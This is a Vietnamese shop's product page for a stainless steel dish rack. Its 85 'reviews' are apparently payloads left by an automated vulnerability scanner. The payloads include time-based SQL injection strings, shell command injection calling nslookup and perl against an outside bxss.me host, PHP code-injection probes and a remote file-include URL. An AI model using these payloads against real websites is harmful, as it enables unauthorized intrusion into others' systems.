KHONG GIA - ke ong cac loai-13
 • 093.2020.665
 • 093.2020.665
 • ckminhquoc@gmail.com

KỆ CHÉN VỈ HỘP – INOX 201 Ø 22 (MẪU 2 CẦU THANG)

(85 đánh giá của khách hàng)

Liên hệ

Đã bán: 0

Danh mục:

Đánh giá sản phẩm

85 đánh giá cho KỆ CHÉN VỈ HỘP – INOX 201 Ø 22 (MẪU 2 CẦU THANG)

 1. 1

  555

 2. http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

  555

 3. 1&n982689=v947415

  555

 4. `(nslookup hitztdynhthrxea59a.bxss.me||perl -e “gethostbyname(‘hitztdynhthrxea59a.bxss.me’)”)`

  555

 5. ‘”

  555

 6. 1

 7. 1

  ;(nslookup hitvraunydcjxc113d.bxss.me||perl -e “gethostbyname(‘hitvraunydcjxc113d.bxss.me’)”)|(nslookup hitvraunydcjxc113d.bxss.me||perl -e “gethostbyname(‘hitvraunydcjxc113d.bxss.me’)”)&(nslookup hitvraunydcjxc113d.bxss.me||perl -e “gethostbyname(‘hitvraunydcjxc113d.bxss.me’)”)

 8. 1*1

  555

 9. 1

  |echo ydaelv$()\ jyzxbd\nz^xyu||a #’ |echo ydaelv$()\ jyzxbd\nz^xyu||a #|” |echo ydaelv$()\ jyzxbd\nz^xyu||a #

 10. 1some_inexistent_file_with_long_name.jpg

  555

 11. -1 OR 3+537-537-1=0+0+0+1

  555

 12. ‘;print(md5(31337));$a=’

  555

 13. ‘.print(md5(31337)).’

  555

 14. 1

  ${@print(md5(31337))}\

 15. 1*889*884*0

  555

 16. (298-292-5)

  555

 17. -1 OR 2+618-618-1=0+0+0+1

  555

 18. 1 RLIKE (SELECT (CASE WHEN (686=686) THEN 1 ELSE 0x28 END)) —

  555

 19. (select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

  555

 20. if(now()=sysdate(),sleep(15),0)

  555

 21. -1; waitfor delay ‘0:0:15’ —

  555

 22. 0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z

  555

 23. -1); waitfor delay ‘0:0:15’ —

  555

 24. 0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z

  555

 25. 1 waitfor delay ‘0:0:15’ —

  555

 26. -5 OR 545=(SELECT 545 FROM PG_SLEEP(15))–

  555

 27. ZQ654YDj’; waitfor delay ‘0:0:15’ —

  555

 28. -5) OR 34=(SELECT 34 FROM PG_SLEEP(15))–

  555

 29. -1)) OR 797=(SELECT 797 FROM PG_SLEEP(15))–

  555

 30. -5) OR 140=(SELECT 140 FROM PG_SLEEP(15))–

  555

 31. Yfmi41kU’ OR 459=(SELECT 459 FROM PG_SLEEP(15))–

  555

 32. -1)) OR 947=(SELECT 947 FROM PG_SLEEP(15))–

  555

 33. XYW4IXxN’; waitfor delay ‘0:0:15’ —

  555

 34. jdVRvdIF’ OR 273=(SELECT 273 FROM PG_SLEEP(15))–

  555

 35. NtgFQW3w’)) OR 485=(SELECT 485 FROM PG_SLEEP(15))–

  555

 36. SUUcT5Lx’) OR 930=(SELECT 930 FROM PG_SLEEP(15))–

  555

 37. 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  555

 38. 7MSgu6RM’)) OR 400=(SELECT 400 FROM PG_SLEEP(15))–

  555

 39. 1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’

  555

 40. hI04YDGB’ OR 565=(SELECT 565 FROM PG_SLEEP(15))–

  555

 41. 1′”

  555

 42. 7OnK7WOL’)) OR 422=(SELECT 422 FROM PG_SLEEP(15))–

  555

 43. 1

  1*555

 44. 1

  555*52*47*0

 45. 1

  WAoJkxlj

 46. @@BaBIw

  555

 47. 1

  555 RLIKE (SELECT (CASE WHEN (422=422) THEN 1 ELSE 0x28 END)) —

 48. 1

  0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z

 49. 1

  if(now()=sysdate(),sleep(15),0)

 50. 1

  (select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/

 51. 1

  (971-411-5)

 52. 1

  555*434*429*0

 53. 1

  -1); waitfor delay ‘0:0:15’ —

 54. 1

  -1; waitfor delay ‘0:0:15’ —

 55. 1

  0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z

 56. 1

  1 waitfor delay ‘0:0:15’ —

 57. 1

  epGXeMaa’; waitfor delay ‘0:0:15’ —

 58. 1

  -5 OR 269=(SELECT 269 FROM PG_SLEEP(15))–

 59. 1

  -5) OR 11=(SELECT 11 FROM PG_SLEEP(15))–

 60. 1

  -1)) OR 641=(SELECT 641 FROM PG_SLEEP(15))–

 61. 1

  BzblCWlB’ OR 102=(SELECT 102 FROM PG_SLEEP(15))–

 62. 1

  4a0hZoCm’)) OR 518=(SELECT 518 FROM PG_SLEEP(15))–

 63. 1

  0BimeOte’ OR 768=(SELECT 768 FROM PG_SLEEP(15))–

 64. 1

  32PplMDO’)) OR 705=(SELECT 705 FROM PG_SLEEP(15))–

 65. 1

  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

 66. 1

  555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’

 67. Http://bxss.me/t/fit.txt

  555

 68. 1&n944777=v956380

  555

 69. 1

  ;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));

 70. HDVSrovT

  555

 71. 1*598*593*0

  555

 72. lBXoN36P’; waitfor delay ‘0:0:15’ —

  555

 73. -5 OR 426=(SELECT 426 FROM PG_SLEEP(15))–

  555

 74. -5) OR 889=(SELECT 889 FROM PG_SLEEP(15))–

  555

 75. -1)) OR 914=(SELECT 914 FROM PG_SLEEP(15))–

  555

 76. s34AihMA’ OR 358=(SELECT 358 FROM PG_SLEEP(15))–

  555

 77. VqXMTlwr’) OR 863=(SELECT 863 FROM PG_SLEEP(15))–

  555

 78. l3ZHiQ4b’)) OR 910=(SELECT 910 FROM PG_SLEEP(15))–

  555

 79. Khách

  555

 80. 1

  1VwSBV0A

 81. 1

  (1140-580-5)

 82. 1

  V8xB3O4C’; waitfor delay ‘0:0:15’ —

 83. 1

  SYCuEW9H’) OR 227=(SELECT 227 FROM PG_SLEEP(15))–

 84. 1

  EytmRpWh’)) OR 581=(SELECT 581 FROM PG_SLEEP(15))–

 85. 1

  1′”

Thêm đánh giá

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Bình luận trên Facebook